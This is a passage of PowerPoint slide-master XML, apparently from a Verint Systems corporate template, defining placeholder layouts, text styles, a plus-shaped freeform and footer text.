          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit cover title style </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19313110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72440" y="1453242"/>
            <a:ext cx="11247120" cy="48414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1873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t="8926" r="462" b="10874"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="-1"/>
            <a:ext cx="12192001" cy="6883577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="12192001"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
            <a:ext cx="4064000" cy="6858001"/>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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588451" y="1700601"/>
            <a:ext cx="3475549" cy="1620991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="1219160" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="3352688" algn="l"/>
              </a:tabLst>
              <a:defRPr lang="en-US" sz="2800" b="0" kern="1200" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Content Placeholder 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336739" y="1307906"/>
            <a:ext cx="8024812" cy="401638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="306901" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="535491" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="764076" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="990549" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336739" y="2102644"/>
            <a:ext cx="8024812" cy="402043"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="306901" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="535491" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="764076" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="990549" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336739" y="2906713"/>
            <a:ext cx="8024812" cy="402336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="306901" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="535491" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="764076" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="990549" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336739" y="3724275"/>
            <a:ext cx="8024812" cy="401403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="306901" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="535491" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="764076" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="990549" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 35"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336739" y="4540250"/>
            <a:ext cx="8024812" cy="402336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 2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82848" y="6483375"/>
            <a:ext cx="759208" cy="178814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="6356352"/>
            <a:ext cx="11234056" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="609475" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1218960" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828437" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2437918" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3047392" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3656867" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4266347" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4875825" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" algn="ctr" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507999" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="609475" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1218960" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828437" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2437918" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3047392" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3656867" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4266347" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4875825" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914354"/>
            <a:fld id="{C87E8D51-AD08-48EE-84A7-E19A6D3C2143}" type="slidenum">
              <a:rPr lang="en-US" sz="800" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr defTabSz="914354"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3698648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72440" y="1934935"/>
            <a:ext cx="11247120" cy="44413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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="1207431"/>
            <a:ext cx="11247120" cy="384919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1">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778768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3755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0262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6354" y="1825625"/>
            <a:ext cx="4937760"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37960" y="1825625"/>
            <a:ext cx="4937760"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12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440" y="0"/>
            <a:ext cx="11247120" cy="1097280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790802" y="148522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90802" y="2309132"/>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3214" y="148522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23214" y="2309132"/>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4856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מלבן 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="619512" y="1456904"/>
            <a:ext cx="11572488" cy="4692725"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="619512" y="1456904"/>
            <a:ext cx="384240" cy="386584"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 157 w 177"/>
              <a:gd name="T1" fmla="*/ 69 h 178"/>
              <a:gd name="T2" fmla="*/ 108 w 177"/>
              <a:gd name="T3" fmla="*/ 69 h 178"/>
              <a:gd name="T4" fmla="*/ 108 w 177"/>
              <a:gd name="T5" fmla="*/ 20 h 178"/>
              <a:gd name="T6" fmla="*/ 88 w 177"/>
              <a:gd name="T7" fmla="*/ 0 h 178"/>
              <a:gd name="T8" fmla="*/ 68 w 177"/>
              <a:gd name="T9" fmla="*/ 20 h 178"/>
              <a:gd name="T10" fmla="*/ 68 w 177"/>
              <a:gd name="T11" fmla="*/ 69 h 178"/>
              <a:gd name="T12" fmla="*/ 20 w 177"/>
              <a:gd name="T13" fmla="*/ 69 h 178"/>
              <a:gd name="T14" fmla="*/ 0 w 177"/>
              <a:gd name="T15" fmla="*/ 89 h 178"/>
              <a:gd name="T16" fmla="*/ 20 w 177"/>
              <a:gd name="T17" fmla="*/ 109 h 178"/>
              <a:gd name="T18" fmla="*/ 68 w 177"/>
              <a:gd name="T19" fmla="*/ 109 h 178"/>
              <a:gd name="T20" fmla="*/ 68 w 177"/>
              <a:gd name="T21" fmla="*/ 158 h 178"/>
              <a:gd name="T22" fmla="*/ 88 w 177"/>
              <a:gd name="T23" fmla="*/ 178 h 178"/>
              <a:gd name="T24" fmla="*/ 108 w 177"/>
              <a:gd name="T25" fmla="*/ 158 h 178"/>
              <a:gd name="T26" fmla="*/ 108 w 177"/>
              <a:gd name="T27" fmla="*/ 109 h 178"/>
              <a:gd name="T28" fmla="*/ 157 w 177"/>
              <a:gd name="T29" fmla="*/ 109 h 178"/>
              <a:gd name="T30" fmla="*/ 177 w 177"/>
              <a:gd name="T31" fmla="*/ 89 h 178"/>
              <a:gd name="T32" fmla="*/ 157 w 177"/>
              <a:gd name="T33" fmla="*/ 6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7" h="178">
                <a:moveTo>
                  <a:pt x="157" y="69"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                  <a:pt x="108" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                  <a:pt x="108" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="9"/>
                  <a:pt x="99" y="0"/>
                  <a:pt x="88" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="0"/>
                  <a:pt x="68" y="9"/>
                  <a:pt x="68" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                  <a:pt x="68" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="69"/>
                  <a:pt x="0" y="78"/>
                  <a:pt x="0" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100"/>
                  <a:pt x="9" y="109"/>
                  <a:pt x="20" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                  <a:pt x="68" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                  <a:pt x="68" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="169"/>
                  <a:pt x="77" y="178"/>
                  <a:pt x="88" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99" y="178"/>
                  <a:pt x="108" y="169"/>
                  <a:pt x="108" y="158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                  <a:pt x="108" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                  <a:pt x="157" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="109"/>
                  <a:pt x="177" y="100"/>
                  <a:pt x="177" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="78"/>
                  <a:pt x="168" y="69"/>
                  <a:pt x="157" y="69"/>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 name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093787" y="1943100"/>
            <a:ext cx="4923291" cy="3992563"/>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3089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2440" y="0"/>
            <a:ext cx="11247120" cy="109728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472440" y="1453243"/>
            <a:ext cx="11247120" cy="47237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10982848" y="6483375"/>
            <a:ext cx="759208" cy="178814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="6356352"/>
            <a:ext cx="11234056" cy="365125"/>
